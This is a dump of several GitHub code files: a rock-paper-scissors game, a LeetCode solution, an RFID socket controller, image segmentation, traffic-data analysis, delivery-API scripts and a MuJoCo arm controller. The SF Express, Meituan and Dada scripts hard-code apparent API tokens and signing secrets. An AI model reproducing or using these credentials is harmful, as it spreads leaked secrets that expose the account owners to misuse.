[]\r\n    # /\r\n    eye_observer.append(element)\r\n    if len(eye_observer) > 14:\r\n        eye_observer.remove(eye_observer[0])\r\n    re2 = eye_observer[len(eye_observer) - 4:len(eye_observer)]\r\n    re3 = eye_observer[len(eye_observer) - 6:len(eye_observer)]\r\n    re4 = eye_observer[len(eye_observer) - 
8:len(eye_observer)]\r\n re5 = eye_observer[len(eye_observer) - 10:len(eye_observer)]\r\n re6 = eye_observer[len(eye_observer) - 12:len(eye_observer)]\r\n re7 = eye_observer[len(eye_observer) - 14:len(eye_observer)]\r\n # //\r\n if re2[:2] == re2[2:4]:\r\n print('re2', re2)\r\n RE_active = re(re2[2:4])\r\n elif re3[:3] == re3[3:6]:\r\n print('re3', re3)\r\n RE_active = re(re3[3:6])\r\n elif re4[:4] == re4[4:8]:\r\n print('re4', re4)\r\n RE_active = re(re4[4:8])\r\n elif re5[:5] == re5[5:10]:\r\n print('re5', re5)\r\n RE_active = re(re5[5:10])\r\n elif re6[:6] == re6[6:12]:\r\n print('re6', re6)\r\n RE_active = re(re6[6:12])\r\n elif re7[:7] == re7[7:14]:\r\n print('re7', re7)\r\n RE_active = re(re7[7:14])\r\n return RE_active\r\n\r\n\r\ndef re(active_re):\r\n print('predict', active_re[0])\r\n if active_re[0] == 'Rock':\r\n active_re = 'Paper'\r\n elif active_re[0] == 'Paper':\r\n active_re = 'Scissor'\r\n elif active_re[0] == 'Scissor':\r\n active_re = 'Rock'\r\n return active_re\r\n\r\n\r\n# 'Rock', 'Paper'\r\n# Paper', 'Rock\r\n# 'Rock', 'Paper', 'Scissor',\r\n# 'Paper', 'Scissor', 'Rock'\r\n# 'Scissor', 'Rock', 'Paper'\r\n\r\n\r\ndef data():\r\n global Draw\r\n global AI_Score\r\n global Player_Score\r\n global Player_State\r\n Data = Label(text=f' {Player_State} \\n'\r\n f' Player = {Player_Score} \\n'\r\n f' AI = {AI_Score} \\n'\r\n f' Draw = {Draw} ')\r\n Data.grid(row=1, column=1)\r\n\r\n\r\ndef player_ai_show(player_img, ai_img):\r\n Player_img = Label(image=player_img)\r\n Player_img.grid(row=1, column=0)\r\n data()\r\n AI_img = Label(image=ai_img)\r\n AI_img.grid(row=1, column=2)\r\n\r\n\r\ndef player_ai_ch(player_ch):\r\n AI = ai_ch(player_ch)\r\n show = Play(player_ch, AI)\r\n player_ai_show(show[0], show[1])\r\n\r\n\r\ndef ai_ch(player_ch):\r\n global AI_predict\r\n AI = AI_predict\r\n if not AI_predict:\r\n AI = random.choice(['Rock', 'Paper', 'Scissor'])\r\n AI_predict = eye(player_ch)\r\n print(AI)\r\n return AI\r\n\r\n\r\nif __name__ == '__main__':\r\n # \\\\\r\n Draw = 0\r\n AI_Score = 0\r\n Player_Score = 0\r\n Player_State = ''\r\n eye_observer = []\r\n AI_predict = ''\r\n # \\\\\r\n window = Tk()\r\n Rock_img = PhotoImage(file='rock.gif')\r\n Paper_img = PhotoImage(file='paper.gif')\r\n Scissor_img = PhotoImage(file='scissor.gif')\r\n bm = Menubutton(text='choose')\r\n bm.menu = Menu(bm)\r\n bm[\"menu\"] = bm.menu\r\n bm.menu.add_command(image=Rock_img, command=lambda: player_ai_ch('Rock'))\r\n bm.menu.add_command(image=Paper_img, command=lambda: player_ai_ch('Paper'))\r\n bm.menu.add_command(image=Scissor_img, command=lambda: player_ai_ch('Scissor'))\r\n bm.grid(row=0, column=0)\r\n\r\n window.mainloop()\r\n","repo_name":"MagicPi-17/RPS-AI-VS-Player","sub_path":"AI RPS001.py","file_name":"AI RPS001.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"48510221","text":"class Solution:\n def numberOfMatches(self, n: int) -> int:\n result = 0\n while n > 1: \n if n % 2 == 1: \n result += (n-1) / 2 \n n = (n-1) / 2 + 1\n else: \n result += n / 2 \n n = n / 2 \n return int(result) \n\nif __name__ == \"__main__\": \n n = 7 \n s = Solution()\n assert s.numberOfMatches(n) == 6\n","repo_name":"code-cp/leetcode","sub_path":"solutions/1688/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5349276382","text":"import RPi.GPIO as GPIO\nfrom mfrc522 
import SimpleMFRC522\nfrom gpiozero import LED\nimport I2C_LCD_driver\n\nimport signal\nimport time\nimport datetime\n\nimport requests\n\nclass Timeout():#class for timeout of input\n class Timeout(Exception):\n pass\n \n def __init__(self,sec):\n self.sec = sec\n \n def __enter__(self):\n signal.signal(signal.SIGALRM, self.raise_timeout)\n signal.alarm(self.sec)\n \n def __exit__(self, *args):\n signal.alarm(0)\n \n def raise_timeout(self, *args):\n raise Timeout.Timeout()\n\n\n# actuators\nreader = SimpleMFRC522()\nunlockitSocket = LED(21)\nmylcd = I2C_LCD_driver.lcd()\n\n# card values\ncurrentCard = 0\nregisteredCard = 0\ntimeLoggedIn = 0\nloginBalance = 0\nbalanceLeft = 0\nstudentName = \"\"\nstudentNumber = 0\ndecrement = 0\n\n\ndef attempt_login(url):\n global timeLoggedIn, loginBalance, studentName, studentNumber\n print(\"attempting login...\")\n response = requests.patch(url, json={'is_using': True}) \n print(response.json())\n if response.status_code == 200:\n print(\"Valid card found\")\n timeLoggedIn = time.time()\n loginBalance = response.json()['balance']\n studentName = response.json()['name']\n actuate_login()\n else:\n print(\"LOGIN FAILED: invalid card\")\n mylcd.lcd_display_string(\"Unregistered Card!\", 1)\n\n\ndef actuate_login():\n global balanceLeft, registeredCard, decrement, unlockitSocket\n balanceLeft = loginBalance\n decrement = 0\n mylcd.lcd_clear()\n mylcd.lcd_display_string(\"Hello {}!\".format(studentName), 1)\n if balanceLeft > 0:\n registeredCard = currentCard\n unlockitSocket.on()\n else:\n mylcd.lcd_display_string(\"You have no load :(\", 2)\n\ndef attempt_logout(url):\n global decrement\n print(\"attempting logout...\")\n actuate_logout()\n print(\"decrement: {}\".format(decrement))\n response = requests.patch(url, json={'decrement': int(decrement), 'is_using': False})\n print(response.json())\n if response.status_code == 200:\n print(\"LOGOUT SUCCESS\")\n else:\n print(\"LOGOUT FAILED\")\n \ndef actuate_logout():\n global registeredCard, loginBalance, balanceLeft\n registeredCard = 0\n loginBalance = 0\n unlockitSocket.off()\n mylcd.lcd_clear()\n mylcd.lcd_display_string(\"Bye {}!\".format(studentName), 1)\n print_lcd_balance(balanceLeft)\n\ndef print_lcd_balance(seconds):\n balanceOutput = datetime.timedelta(seconds=seconds)\n mylcd.lcd_display_string(\"Balance: {}\".format(balanceOutput), 2)\n\ndef main():\n global currentCard, registeredCard, timeLoggedIn, balanceLeft, decrement\n while True:\n try:\n with Timeout(1):\n currentCard = 0\n print(\"reading card...\")\n currentCard, cardText = reader.read()\n print(\"Card Found: {}\".format(currentCard))\n time.sleep(1)\n except:\n if currentCard == 0:\n print(\"No Card\")\n mylcd.lcd_clear()\n mylcd.lcd_display_string(\"No Card\", 1)\n finally:\n GPIO.cleanup()\n \n # handle login if new card found\n if registeredCard == 0 and currentCard != registeredCard:\n #if not isLoginPatching:\n attempt_login('https://unlockitsocketapp.herokuapp.com/api/simple/students/{}/'.format(currentCard))\n \n # handle logout if registered card is no more\n elif registeredCard > 0 and currentCard != registeredCard:\n #if not isLogoutPatching:\n attempt_logout('https://unlockitsocketapp.herokuapp.com/api/simple/students/{}/'.format(registeredCard))\n \n # handle balance calculations\n if registeredCard > 0:\n decrement = time.time() - timeLoggedIn\n balanceLeft = loginBalance - decrement\n balanceLeft = balanceLeft if balanceLeft > 0 else 0\n print(\"Balance left: {}\".format(balanceLeft))\n 
print_lcd_balance(balanceLeft)\n if balanceLeft <= 0:\n print(\"YOUR TIME IS UP, PINHEAD!\")\n mylcd.lcd_clear()\n mylcd.lcd_display_string(\"YOUR TIME IS UP!\", 2)\n attempt_logout('https://unlockitsocketapp.herokuapp.com/api/simple/students/{}/'.format(registeredCard))\n\nmain()\n\n\n","repo_name":"jonahcancio/unlockitsocket_rpi","sub_path":"unlockit_socket.py","file_name":"unlockit_socket.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72467619068","text":"import cv2\nimport numpy as np\ndef segmentation(rgb_image, limite_inferior = 5, limite_superior = 170):\n ''' \n rgb_image: imagem RGB\n limite_inferior: limite inferior para considerar vermelho no canal H do HSV\n limite_superior: limite superior para considerar vermelho no canal H do HSV\n Retorna a imagem RGB com o pixels foram da região segmentada zerados\n '''\n \n #Convertendo a imagem para HSV\n hsv_image = cv2.cvtColor(rgb_image, cv2.COLOR_RGB2HSV)\n\n #Pegando canal H\n h_image = hsv_image[:,:,0]\n \n #Pegando valores menores que 10 e maiores que 170 do canal H, que representa vermelho o restante é serado\n mascara_binaria = np.zeros((h_image.shape[0],h_image.shape[1]),np.uint8)\n mascara_binaria[(h_image[:,:] <= limite_inferior) | (h_image[:,:] >= limite_superior)] = 1\n \n # Converte a máscara binária para o formato RGB\n mascara_binaria_rgb = cv2.cvtColor(mascara_binaria, cv2.COLOR_GRAY2RGB)\n \n return mascara_binaria_rgb*rgb_image\n\ndef save_img(rbg_img, name_img):\n \n cv2.imwrite(name_img,rbg_img)","repo_name":"mauriciobenjamin700/IC_V2","sub_path":"Aplicativo/Desktop/Tkinter/build/lib/pacote/segmentation_02.py","file_name":"segmentation_02.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39939943300","text":"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport pandas as pd \n\nimport os\nimport sys\n\nimport matplotlib.colors as colors\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\nimport sumolib # noqa\nfrom sumolib.visualization import helpers\n\nimport csv\nimport os\n\n\ndef SetClasse(value):\n if isinstance(value, float):\n if (value >= 0 and value <= 0.15): return 'Free-flow'\n elif (value > 0.15 and value <= 0.33): return 'Reasonably Free-flow'\n elif (value > 0.33 and value <= 0.50): return 'Stable-flow'\n elif (value > 0.50 and value <= 0.60): return 'Approaching unstable-flow'\n elif (value > 0.60 and value <= 0.70): return 'Unstable-flow'\n elif (value > 0.70 and value <= 1.00): return 'Breakdown-flow'\n else:\n return 1 #'Free-flow'\n else:\n return str(value)\n\n\ndef Query(EXP, ROAD, SLOT):\n \n # BASELINE GERAL ***************************************\n df1 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_LOS_GERAL.csv\")\n df1['Slot'] = df1['Slot'].astype(int)\n df1['Media'] = df1['Media'].astype(float)\n df1['Velo'] = df1['Velo'].astype(float)\n df1['Classe'] = df1['Classe'].astype(float)\n df1['STime'] = df1['STime'].astype(float)\n df1['Timer'] = df1['Timer'].astype(float)\n df1['Source'] = \"Baseline\"\n\n # df5['ClusterLOS'] = df5['ClusterLOS'].astype(float)\n df1['ClasseNum'] = df1['Classe'].map(lambda x: SetClasse(x))\n res = df1\n res.sort_values(by=['STime'])\n df1_select = res[['RoadTag','Slot','Source','STime', 
'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n\n    # BASELINE 1TO2 ***************************************\n    df2 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_BASELINE_1TO2.csv\")\n    df2['Slot'] = df2['Slot'].astype(int)\n    df2['Media'] = df2['Media'].astype(float)\n    df2['Velo'] = df2['Velo'].astype(float)\n    df2['Classe'] = df2['Classe'].astype(float)\n    df2['STime'] = df2['STime'].astype(float)\n    df2['Timer'] = df2['Timer'].astype(float)\n    df2['Source'] = \"1TO2\"\n\n    df2['ClasseNum'] = df2['Classe'].map(lambda x: SetClasse(x))\n    res = df2\n    res.sort_values(by=['STime'])\n    df2_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n\n    # BASELINE RANDOM ***************************************\n    df3 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_BASELINE_RANDOM.csv\")\n    df3['Slot'] = df3['Slot'].astype(int)\n    df3['Media'] = df3['Media'].astype(float)\n    df3['Velo'] = df3['Velo'].astype(float)\n    df3['Classe'] = df3['Classe'].astype(float)\n    df3['STime'] = df3['STime'].astype(float)\n    df3['Timer'] = df3['Timer'].astype(float)\n    df3['Source'] = \"RAND\"\n\n    df3['ClasseNum'] = df3['Classe'].map(lambda x: SetClasse(x))\n    res = df3\n    res.sort_values(by=['STime'])\n    df3_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n\n    # BASELINE THRESHOLD ***************************************\n    df4 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_BASELINE_THRESHOLD.csv\")\n    df4['Slot'] = df4['Slot'].astype(int)\n    df4['Media'] = df4['Media'].astype(float)\n    df4['Velo'] = df4['Velo'].astype(float)\n    df4['Classe'] = df4['Classe'].astype(float)\n    df4['STime'] = df4['STime'].astype(float)\n    df4['Timer'] = df4['Timer'].astype(float)\n    df4['Source'] = \"LIM-5\"\n\n    df4['ClasseNum'] = df4['Classe'].map(lambda x: SetClasse(x))\n    res = df4\n    res.sort_values(by=['STime'])\n    df4_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n\n    # DBSCAN ***************************************\n    df5 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_LOS_DBSCAN.csv\") \n    df5['Slot'] = df5['Slot'].astype(int)\n    df5['Media'] = df5['Media'].astype(float)\n    df5['Classe'] = df5['Classe'].astype(float)\n    df5['STime'] = df5['STime'].astype(float)\n    df5['Timer'] = df5['Timer'].astype(float)\n    df5['Clusteres'] = df5['Clusteres'].astype(int)\n    df5['Source'] = \"DBSCAN\"\n\n    # df5['ClusterLOS'] = df5['ClusterLOS'].astype(float)\n    df5['ClasseNum'] = df5['Classe'].map(lambda x: SetClasse(x))\n    res = df5\n    res.sort_values(by=['STime'])\n    df5_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n    # *****************************************************************************************\n\n    # XMEANS ***************************************\n    df6 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_LOS_XMEANS.csv\") \n    df6['Slot'] = df6['Slot'].astype(int)\n    df6['Media'] = df6['Media'].astype(float)\n    df6['Classe'] = df6['Classe'].astype(float)\n    df6['STime'] = df6['STime'].astype(float)\n    df6['Clusteres'] = df6['Clusteres'].astype(int)\n    df6['Source'] = \"X-Means\"\n\n    df6['ClasseNum'] = df6['Classe'].map(lambda x: SetClasse(x))\n    res = df6\n    res.sort_values(by=['STime'])\n    df6_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n    # *****************************************************************************************\n\n    
res = pd.concat([df1_select,df2_select,df3_select,df4_select,df5_select,df6_select], sort=False)\n\n res = res[['RoadTag','Slot','Source','Classe','Descricao']]\n\n # 22|6 - 23|7 - 87|8 (1 sequencia)\n\n res = res[(res[\"RoadTag\"] == ROAD) & (res[\"Slot\"] == SLOT)]\n\n los = res.groupby(['Source', 'RoadTag', 'Slot']).mean()\n\n los['Descricao'] = los['Classe'].map(lambda x: SetClasse(x))\n los['Vehicle'] = EXP\n\n return los\n\n\n\nEXP = \"30\"\nROAD=87\nSLOT=6\n\nwtrResult = csv.writer(open (\"result_los_auto.csv\", 'a'), delimiter=',', lineterminator='\\n')\n\n# wtrResult.writerow (['Source','RoadTag', 'Slot', 'Classe', 'Descricao', 'Vehicle'])\n\npistas = [[22,6], [23,7], [87,8], [22,4], [23,3], [23,4], [23,5], [87,4], [87,6]]\nresult = []\nfor R, S in pistas:\n for C in [30,50,70]: \n print(str(C) + \" - \" + str(R) + \" - \" + str(S))\n los = Query(str(C),R,S)\n los = los.reset_index()\n \n for index, row in los.iterrows():\n wtrResult.writerow ([row[\"Source\"],row[\"RoadTag\"],row[\"Slot\"],row[\"Classe\"],row[\"Descricao\"],row[\"Vehicle\"] ])\n\n\n# print(result)\n# DF = pd.DataFrame(np.asarray(result), columns=['Source', 'RoadTag', 'Slot', 'Classe', 'Descricao', 'Vehicle'])\n# print(DF)\n# wtrResult.writerow (los['Source'], los['RoadTag'])\n\n\n# \n\n\n\n# 22|6 - 23|7 - 87|8 (1 sequencia) oksa\n\n# [22,6]\n# [23,7]\n# [87,8]\n# [22,4]\n# [23,3]\n# [23,4]\n# [23,5]\n# [87,4]\n# [87,6]\n\n\n# for R, S in [[1,2],[1,4]]:\n# print(R)\n# print(S)\n# res = res[(res[\"RoadTag\"] == R) & (res[\"Slot\"] == S)]\n# for C in [30,50,70]:\n# print(C)\n\n\n\n\n\n# LOS = res[['ClasseNum','Descricao']].copy()\n# LOS.drop_duplicates(subset=None, keep=\"first\", inplace=True)\n# LOS=LOS.sort_values(by=['ClasseNum'])\n\n","repo_name":"urbancomp/fogarch","sub_path":"FogLayer/visualization/chart4tab.py","file_name":"chart4tab.py","file_ext":"py","file_size_in_byte":7092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"3186473299","text":"#!/usr/bin/env python3.5\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#from matplotlib.backends.backend_pdf import PdfPages\n\n\nx = pd.read_csv('file.csv', na_values={'Last Name': ['.', 'NA'], 'Pre-Test Score': ['.']})\n\na = x['age']\nprint(a)\n\nb = x['postTestScore']\nprint(b)\n\n\n#do souboru\nf = plt.figure()\nplt.plot(a)\nf.savefig('age.pdf')\n\n#plt.show(b.plot())\n","repo_name":"MilanGren/hello-world","sub_path":"pandas/pnds.py","file_name":"pnds.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24985705993","text":"# -*- coding:utf-8 -*-\nimport time\nimport base64\nimport hashlib\nimport requests\nimport json\nimport jsonpath\n\n\ndef get_mt_sign(data):\n\n sign_key = 'i0wl5fx35vfyekms'\n\n list_data = list(data.keys())\n string_sign = sign_key\n sort_list = sorted(list_data)\n\n for item in sort_list:\n if item == 'sign':\n continue\n string_sign += str(item)\n if item == 'biz':\n string_sign += str(data[item]).replace(\"'\", '\"')\n else:\n string_sign += str(data[item])\n\n sign = hashlib.sha1(string_sign.encode('utf-8')).hexdigest()\n return sign\n\n\ndef deal_mt(orderid,url_1,fix_biz):\n\n # 获取sign\n timestamp = int(time.time())\n order_id = str(orderid)\n biz = {'biz': fix_biz}\n basic_zd = {\n 'appAuthToken': '5d579664aaa45e487c6dab03dbaaf595ed54468034c05ffe41a554781c8c2a479923dee7c442c471ab34b21e162a6956',\n 'timestamp': timestamp, 'charset': 'utf-8', 'developerId': 
100789, 'version': 2}\n basic_payload = basic_zd\n basic_payload_2 = basic_zd\n basic_zd.update(biz)\n\n sign = get_mt_sign(basic_zd)\n\n # 获取配送费\n sign = {'sign': sign}\n biz = {'biz': fix_biz}\n\n basic_payload.update(biz)\n basic_payload.update(sign)\n\n url = url_1\n\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=basic_payload)\n\n return response.text\n\ndef creat_dd():\n\n\ttimestamp=int(time.time())\n\n\tjichu_url=\"/api/order/addOrder\"\n\n\tdict_str = {\n\t\t\"shop_no\": \"63381-4279453\",\n\t\t\"origin_id\":str(orderid),\n\t\t\"city_code\": \"1547215874\",\n\t\t\"cargo_price\": str(order_source),\n\t\t\"is_prepay\":str(order_num),\n\t\t\"receiver_name\": \"1\",\n\t\t\"receiver_address\":\"2\",\n\t\t\"receiver_lat\": str(order_time),\n\t\t\"receiver_lng\": \"0\",\n\t\t\"callback\": \"0\",\n\t\t\"cargo_weight\":str(timestamp),\n\t}\n\ndef dd_get_chengshicode():\n\n\ttimestamp=int(time.time())\n\tjichu_url=\"/api/order/addOrder\"\n\tapp_secret=\"acdc9efb79db1fad06a59dea5f3eb5e3\"\n\tdict_str = {\n \"app_key\": \"dadae480b0594b5b90c\",\n \"body\": \"\",\n \"format\": \"json\",\n \"source_id\": \"63381-4279453\",\n \"timestamp\":timestamp,\n \"v\": \"1.0\",\n \"app_secret\": \"acdc9efb79db1fad06a59dea5f3eb5e3\"\n }\n\n\tlist_dict=sorted(dict_str.keys())\n\tprint(list_dict)\n\tstr_list=app_secret\n\tfor item in list_dict:\n\t\tif item=='app_secret':\n\t\t\tcontinue\n\t\telse:\n\t\t\tstr_list+=str(dict_str[item])\n\n\tstr_list+=app_secret\n\n\n\n\ndef creat_sf(orderid,order_source,order_num,order_time,costomer,costomer_phone,costomer_address,costomer_lng,costomer_lat,total_price):\n\n\ttimestamp=int(time.time())\n\n\tjichu_url=\"/open/api/external/createorder?\"\n\n\tdict_str = {\n\t\t\"shop_id\": \"6250508608337\",\n\t\t\"shop_order_id\":str(orderid),\n\t\t\"dev_id\": \"1547215874\",\n\t\t\"order_source\": str(order_source),\n\t\t\"order_sequence\":str(order_num),\n\t\t\"pay_type\": \"1\",\n\t\t\"lbs_type\":\"2\",\n\t\t\"order_time\": str(order_time),\n\t\t\"is_appoint\": \"0\",\n\t\t\"is_person_direct\": \"0\",\n\t\t\"push_time\":str(timestamp),\n\t\t\"version\": \"17\",\n\t\t\"is_insured\": \"0\",\n\t\t\"receive\": {\n\t\t\t\"user_name\": str(costomer),\n\t\t\t\"user_phone\": str(costomer_phone),\n\t\t\t\"user_address\": str(costomer_address),\n\t\t\t\"user_lng\": str(costomer_lng),\n\t\t\t\"user_lat\": str(costomer_lat)\n\t\t},\n\t\t\"order_detail\": {\n\t\t\t\"total_price\": str(total_price),\n\t\t\t\"product_type\": \"1\",\n\t\t\t\"weight_gram\": \"1000\",\n\t\t\t\"product_num\": \"1\",\n\t\t\t\"product_type_num\": \"1\",\n\t\t\t\"product_detail\": [\"hmj\", \"2\"]\n\t\t}\n\t}\n\n\tpush_str=(str(dict_str)+'&1547215874&98fd298d895379335a8d85a7ed5917c5').replace(\"'\",'\"')\n\n\n\t#计算base64\n\tstr_md5 = hashlib.md5(push_str.encode(encoding='utf-8')).hexdigest()\n\tbytes_url = str_md5.encode(\"utf-8\")\n\tstr_url = base64.b64encode(bytes_url) # 被编码的参数必须是二进制数据\n\tstr_url=str_url.decode('UTF-8')\n\n\turl = \"https://openic.sf-express.com\"+jichu_url+\"sign=\"+str(str_url)\n\n\tpayload = json.dumps(dict_str,ensure_ascii=False)\n\tpayload.replace(' ','').replace(\"'\",'\"')\n\tprint(payload)\n\theaders = {\n\t 'Content-Type': 'application/json'\n\t}\n\n\tresponse = requests.request(\"POST\", url, headers=headers, data=payload)\n\n\tprint(response.text)\n\n# -----------------------------------取消订单-----------------------------------------------\n\ndef cancel_sf(orderid):\n\n\ttimestamp = 
int(time.time())\n\n\tdict_str = {\n\t\t\"order_id\": str(orderid),\n\t\t\"order_type\": \"2\",\n\t\t\"dev_id\": \"1547215874\",\n\t\t\"push_time\": str(timestamp)\n\t}\n\tpush_str = (str(dict_str) + '&1547215874&98fd298d895379335a8d85a7ed5917c5').replace(\"'\", '\"')\n\n\t# 计算base64\n\tstr_md5 = hashlib.md5(push_str.encode(encoding='utf-8')).hexdigest()\n\tbytes_url = str_md5.encode(\"utf-8\")\n\tstr_url = base64.b64encode(bytes_url) # 被编码的参数必须是二进制数据\n\tstr_url = str_url.decode('UTF-8')\n\n\turl = \"https://openic.sf-express.com/open/api/external/createorder?sign=\" + str(str_url)\n\n\tpayload = json.dumps(dict_str)\n\tpayload.replace(\"'\", '\"')\n\n\theaders = {\n\t\t'Content-Type': 'application/json'\n\t}\n\n\tresponse = requests.request(\"POST\", url, headers=headers, data=payload)\n\n\tprint(response.text)\n\n\ndef cancel_mt_reason(orderid):\n\n\t# timestamp = int(time.time())\n\turl = 'https://api-open-cater.meituan.com/waimai/order/queryZbCancelDeliveryReason'\n\n\tbiz = {\"orderId\": orderid}\n\tbiz = json.dumps(biz)\n\n\tget_data = deal_mt(orderid, url, biz)\n\n\tdata_json = json.loads(get_data)\n\n\treason = jsonpath.jsonpath(data_json, '$..code')\n\n\ndef cancal_mt(orderid,reasonCode,reasonContent):\n\n\t# timestamp = int(time.time())\n\turl = 'https://api-open-cater.meituan.com/waimai/order/cancelZbLogisticsByWmOrderId'\n\n\tbiz = {\n\t\t\"detailContent\": reasonContent,\n\t\t\"orderId\": orderid,\n\t\t\"reasonCode\": reasonCode\n\t}\n\tbiz = json.dumps(biz)\n\n\tget_data = deal_mt(orderid, url, biz)\n\n\tdata_json = json.loads(get_data)\n\tarrivel_time = jsonpath.jsonpath(data_json, '$..code')\n\n","repo_name":"letmedothisa/linux_share","sub_path":"顺丰发配送.py","file_name":"顺丰发配送.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38877393234","text":"#!/usr/bin/env python3\n\n# Author: Paul Daniel (pdd@mp.aau.dk)\n\nfrom collections import defaultdict\nimport os\nfrom pathlib import Path\nimport mujoco_py as mp\nimport time\nimport numpy as np\nfrom simple_pid import PID\nfrom termcolor import colored\nimport ikpy\nfrom pyquaternion import Quaternion\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nimport copy \nfrom decorators import debug\n\n\nclass MJ_Controller(object):\n \"\"\"\n Class for control of an robotic arm in MuJoCo.\n It can be used on its own, in which case a new model, simulation and viewer will be created. 
\n    It can also be passed these objects when creating an instance, in which case the class can be used\n    to perform tasks on an already instantiated simulation.\n    \"\"\"\n\n    def __init__(self, model=None, simulation=None, viewer=None):\n        path = os.path.realpath(__file__)\n        path = str(Path(path).parent.parent.parent)\n        if model==None:\n            self.model = mp.load_model_from_path(path + '/UR5+gripper/UR5gripper_2_finger.xml')\n        else:\n            self.model = model\n        if simulation==None:\n            self.sim = mp.MjSim(self.model)\n        else:\n            self.sim = simulation\n        if viewer==None:\n            self.viewer = mp.MjViewer(self.sim)\n        else:\n            self.viewer = viewer\n        self.create_lists()\n        self.groups = defaultdict(list)\n        self.groups['All'] = [i for i in range(len(self.sim.data.ctrl))]\n        self.create_group('Arm', [i for i in range(5)])\n        self.create_group('Gripper', [6])\n        self.actuated_joint_ids = np.array([i[2] for i in self.actuators])\n        self.reached_target = False\n        self.current_output = np.zeros(len(self.sim.data.ctrl))\n        self.image_counter = 0\n        self.ee_chain = ikpy.chain.Chain.from_urdf_file(path + '/UR5+gripper/ur5_gripper.urdf')\n        self.cam_matrix = None\n        self.cam_init = False\n        self.last_movement_steps = 0\n        # self.move_group_to_joint_target()\n\n\n    def create_group(self, group_name, idx_list):\n        \"\"\"\n        Allows the user to create custom objects for controlling groups of joints.\n        The method show_model_info can be used to get lists of joints and actuators.\n        Args:\n            group_name: String defining the desired name of the group.\n            idx_list: List containing the IDs of the actuators that will belong to this group.\n        \"\"\"\n\n        try:\n            assert len(idx_list) <= len(self.sim.data.ctrl), 'Too many joints specified!'\n            assert group_name not in self.groups.keys(), 'A group with name {} already exists!'.format(group_name)\n            assert np.max(idx_list) <= len(self.sim.data.ctrl), 'List contains invalid actuator ID (too high)'\n\n            self.groups[group_name] = idx_list\n            print('Created new control group \\'{}\\'.'.format(group_name))\n\n        except Exception as e:\n            print(e)\n            print('Could not create a new group.')\n\n    def show_model_info(self):\n        \"\"\"\n        Displays relevant model info for the user, namely bodies, joints, actuators, as well as their IDs and ranges.\n        Also gives info on which actuators control which joints and which joints are included in the kinematic chain, \n        as well as the PID controller info for each actuator. 
\n \"\"\"\n\n print('\\nNumber of bodies: {}'.format(self.model.nbody))\n for i in range(self.model.nbody):\n print('Body ID: {}, Body Name: {}'.format(i, self.model.body_id2name(i)))\n\n print('\\nNumber of joints: {}'.format(self.model.njnt))\n for i in range(self.model.njnt):\n print('Joint ID: {}, Joint Name: {}, Limits: {}'.format(i, self.model.joint_id2name(i), self.model.jnt_range[i]))\n\n print('\\nNumber of Actuators: {}'.format(len(self.sim.data.ctrl)))\n for i in range(len(self.sim.data.ctrl)):\n print('Actuator ID: {}, Actuator Name: {}, Controlled Joint: {}, Control Range: {}'.format(i, self.model.actuator_id2name(i), self.actuators[i][3], self.model.actuator_ctrlrange[i]))\n\n print('\\nJoints in kinematic chain: {}'.format([i.name for i in self.ee_chain.links]))\n\n print('\\nPID Info: \\n')\n for i in range(len(self.actuators)):\n print('{}: P: {}, I: {}, D: {}, setpoint: {}, sample_time: {}'.format(self.actuators[i][3], self.actuators[i][4].tunings[0], self.actuators[i][4].tunings[1], \n self.actuators[i][4].tunings[2], self.actuators[i][4].setpoint, self.actuators[i][4].sample_time))\n\n print('\\n Camera Info: \\n')\n for i in range(self.model.ncam):\n print('Camera ID: {}, Camera Name: {}, Camera FOV (y, degrees): {}, Position: {}, Orientation: {}'.format(i, self.model.camera_id2name(i), \n self.model.cam_fovy[i], self.model.cam_pos0[i], self.model.cam_mat0[i]))\n\n\n def create_lists(self):\n \"\"\"\n Creates some basic lists and fill them with initial values. This function is called in the class costructor.\n The following lists/dictionaries are created:\n - controller_list: Contains a controller for each of the actuated joints. This is done so that different gains may be \n specified for each controller.\n - current_joint_value_targets: Same as the current setpoints for all controllers, created for convenience.\n - current_output = A list containing the ouput values of all the controllers. 
